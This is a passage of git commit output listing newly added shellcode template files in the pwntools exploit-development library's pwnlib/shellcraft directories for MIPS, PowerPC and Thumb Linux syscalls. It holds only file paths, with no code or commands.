pwnlib/shellcraft/templates/mips/linux/clock_getres.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/clock_gettime.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/clock_nanosleep.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/clock_settime.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/clone.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/close.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/connect.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/creat.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/dup.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/dup2.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/dup3.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/echo.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/epoll_create.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/epoll_create1.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/epoll_ctl.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/epoll_pwait.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/epoll_wait.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/execve.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/exit.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/faccessat.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/fallocate.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/fchdir.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/fchmod.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/fchmodat.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/fchown.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/fchownat.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/fcntl.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/fdatasync.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/flock.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/fork.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/forkbomb.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/forkexit.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/fstat.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/fstat64.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/fstatat64.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/fsync.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/ftruncate.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/ftruncate64.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/futimesat.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/getcwd.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/getegid.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/geteuid.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/getgid.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/getgroups.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/getitimer.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/getpeername.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/getpgid.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/getpgrp.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/getpid.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/getpmsg.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/getppid.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/getpriority.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/getresgid.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/getresuid.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/getrlimit.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/getrusage.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/getsid.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/getsockname.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/getsockopt.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/gettimeofday.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/getuid.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/gtty.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/ioctl.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/ioperm.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/iopl.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/kill.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/killparent.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/lchown.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/link.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/linkat.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/listen.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/lseek.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/lstat.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/lstat64.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/madvise.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/mincore.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/mkdir.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/mkdirat.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/mknod.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/mknodat.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/mlock.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/mlockall.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/mmap.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/mprotect.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/mq_notify.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/mq_open.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/mq_timedreceive.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/mq_timedsend.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/mq_unlink.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/mremap.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/msync.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/munlock.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/munlockall.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/munmap.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/nanosleep.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/nice.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/open.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/openat.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/pause.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/pipe.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/pipe2.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/poll.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/ppoll.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/prctl.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/pread.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/preadv.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/prlimit64.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/profil.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/ptrace.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/putpmsg.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/pwrite.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/pwritev.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/readahead.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/readdir.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/readlink.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/readlinkat.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/readv.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/recv.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/recvfrom.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/recvmmsg.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/recvmsg.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/remap_file_pages.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/rename.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/renameat.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/rmdir.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/sched_get_priority_max.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/sched_get_priority_min.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/sched_getaffinity.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/sched_getparam.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/sched_getscheduler.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/sched_rr_get_interval.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/sched_setaffinity.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/sched_setparam.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/sched_setscheduler.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/sched_yield.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/select.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/sendfile.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/sendfile64.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/setdomainname.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/setgid.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/setgroups.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/sethostname.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/setitimer.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/setpgid.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/setpriority.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/setregid.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/setresgid.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/setresuid.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/setreuid.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/setrlimit.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/setsid.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/settimeofday.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/setuid.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/sh.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/sigaction.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/sigaltstack.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/signal.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/sigpending.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/sigprocmask.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/sigsuspend.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/splice.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/stat.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/stat64.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/stime.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/stty.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/symlink.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/symlinkat.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/sync.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/sync_file_range.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/syslog.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/tee.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/time.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/timer_create.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/timer_delete.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/timer_getoverrun.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/timer_gettime.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/timer_settime.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/truncate.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/truncate64.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/ulimit.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/umask.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/uname.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/unlink.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/unlinkat.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/unshare.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/ustat.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/utime.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/utimensat.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/utimes.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/vfork.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/vhangup.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/vmsplice.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/wait4.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/waitid.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/waitpid.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/write.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/writev.asm create mode 100644 pwnlib/shellcraft/templates/mips/nop.asm create mode 100644 pwnlib/shellcraft/templates/mips/push.asm create mode 100644 pwnlib/shellcraft/templates/mips/pushstr.asm create mode 100644 pwnlib/shellcraft/templates/mips/setregs.asm create mode 100644 pwnlib/shellcraft/templates/mips/trap.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/__doc__ create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/__doc__ create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/accept.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/access.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/acct.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/alarm.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/bind.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/brk.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/chdir.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/chmod.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/chown.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/chroot.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/clock_getres.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/clock_gettime.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/clock_nanosleep.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/clock_settime.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/clone.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/close.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/connect.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/creat.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/dup.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/dup2.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/dup3.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/epoll_create.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/epoll_create1.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/epoll_ctl.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/epoll_pwait.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/epoll_wait.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/execve.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/exit.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/faccessat.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/fallocate.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/fchdir.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/fchmod.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/fchmodat.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/fchown.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/fchownat.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/fcntl.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/fdatasync.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/flock.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/fork.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/fstat.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/fstat64.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/fstatat64.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/fsync.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/ftruncate.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/ftruncate64.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/futimesat.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/getcwd.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/getegid.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/geteuid.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/getgid.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/getgroups.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/getitimer.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/getpeername.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/getpgid.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/getpgrp.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/getpid.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/getpmsg.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/getppid.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/getpriority.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/getresgid.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/getresuid.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/getrlimit.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/getrusage.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/getsid.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/getsockname.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/getsockopt.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/gettimeofday.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/getuid.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/gtty.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/ioctl.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/ioperm.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/iopl.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/kill.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/lchown.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/link.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/linkat.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/listen.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/lseek.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/lstat.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/lstat64.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/madvise.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/mincore.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/mkdir.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/mkdirat.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/mknod.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/mknodat.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/mlock.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/mlockall.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/mmap.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/mprotect.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/mq_notify.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/mq_open.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/mq_timedreceive.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/mq_timedsend.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/mq_unlink.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/mremap.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/msync.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/munlock.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/munlockall.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/munmap.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/nanosleep.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/nice.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/open.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/openat.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/pause.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/pipe.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/pipe2.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/poll.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/ppoll.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/prctl.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/pread.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/preadv.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/prlimit64.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/profil.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/ptrace.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/putpmsg.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/pwrite.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/pwritev.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/read.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/readahead.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/readdir.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/readlink.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/readlinkat.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/readv.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/recv.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/recvfrom.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/recvmmsg.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/recvmsg.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/remap_file_pages.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/rename.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/renameat.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/rmdir.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/sched_get_priority_max.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/sched_get_priority_min.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/sched_getaffinity.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/sched_getparam.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/sched_getscheduler.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/sched_rr_get_interval.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/sched_setaffinity.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/sched_setparam.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/sched_setscheduler.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/sched_yield.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/select.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/sendfile.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/sendfile64.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/setdomainname.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/setgid.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/setgroups.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/sethostname.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/setitimer.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/setpgid.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/setpriority.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/setregid.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/setresgid.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/setresuid.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/setreuid.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/setrlimit.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/setsid.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/settimeofday.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/setuid.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/sigaction.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/sigaltstack.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/signal.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/sigpending.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/sigprocmask.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/sigreturn.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/sigsuspend.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/splice.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/stat.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/stat64.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/stime.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/stty.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/symlink.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/symlinkat.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/sync.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/sync_file_range.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/syslog.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/tee.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/time.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/timer_create.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/timer_delete.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/timer_getoverrun.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/timer_gettime.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/timer_settime.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/truncate.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/truncate64.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/ulimit.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/umask.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/uname.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/unlink.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/unlinkat.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/unshare.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/ustat.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/utime.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/utimensat.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/utimes.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/vfork.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/vhangup.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/vmsplice.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/wait4.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/waitid.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/waitpid.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/write.asm create mode 100644 pwnlib/shellcraft/templates/powerpc/linux/writev.asm create mode 100644 pwnlib/shellcraft/templates/thumb/crash.asm create mode 100644 pwnlib/shellcraft/templates/thumb/itoa.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/accept.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/access.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/acct.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/alarm.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/bind.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/brk.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/cat.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/chdir.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/chmod.asm create mode 100644 